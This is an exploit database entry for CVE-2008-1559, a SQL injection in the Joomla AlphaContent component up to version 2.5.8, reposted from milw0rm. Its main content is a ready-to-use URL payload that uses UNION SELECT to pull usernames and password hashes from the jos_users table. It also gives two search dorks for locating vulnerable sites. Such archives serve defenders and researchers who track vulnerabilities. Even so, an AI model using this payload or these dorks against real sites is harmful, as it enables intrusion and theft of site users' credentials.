Joomla Component alphacontent <= 2.5.8 id SQL Injection Vulnerability

2008-03-25T00:00:00
ID EDB-ID:5310
Type exploitdb
Reporter cO2
Modified 2008-03-25T00:00:00

Description

Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability. CVE-2008-1559. Webapps exploit for php platform

                                        
                                            ##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~]  Version() : '2.5.8 '
###########################################
#
# DORK 1 :  inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
 
index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################

side note:
  &lt;name&gt;alphacontent&lt;/name&gt;
  &lt;creationDate&gt;25 Jul 2007&lt;/creationDate&gt;
  &lt;author&gt;Bernard Gilly&lt;/author&gt;
  &lt;copyright&gt;This component is released under the GNU/GPL License.&lt;/copyright&gt;
  &lt;authorEmail&gt;contact@visualclinic.fr&lt;/authorEmail&gt;

  &lt;authorUrl&gt;www.visualclinic.fr&lt;/authorUrl&gt;
  &lt;version&gt;2.5.8&lt;/version&gt;
  &lt;description&gt;Directory component with alphabetical indexes for Joomla's Content&lt;/description&gt;

  &lt;name&gt;alphacontent&lt;/name&gt;
  &lt;creationDate&gt;16 Sept 2006&lt;/creationDate&gt;
  &lt;author&gt;Bernard Gilly&lt;/author&gt;
  &lt;copyright&gt;This component is released under the GNU/GPL License.&lt;/copyright&gt;
  &lt;authorEmail&gt;contact@visualclinic.fr&lt;/authorEmail&gt;

  &lt;authorUrl&gt;www.visualclinic.fr&lt;/authorUrl&gt;
  &lt;version&gt;2.5.4&lt;/version&gt;
  &lt;description&gt;Directory component and alphabetical indexes for Mambo/Joomla's Content&lt;/description&gt;

# milw0rm.com [2008-03-25]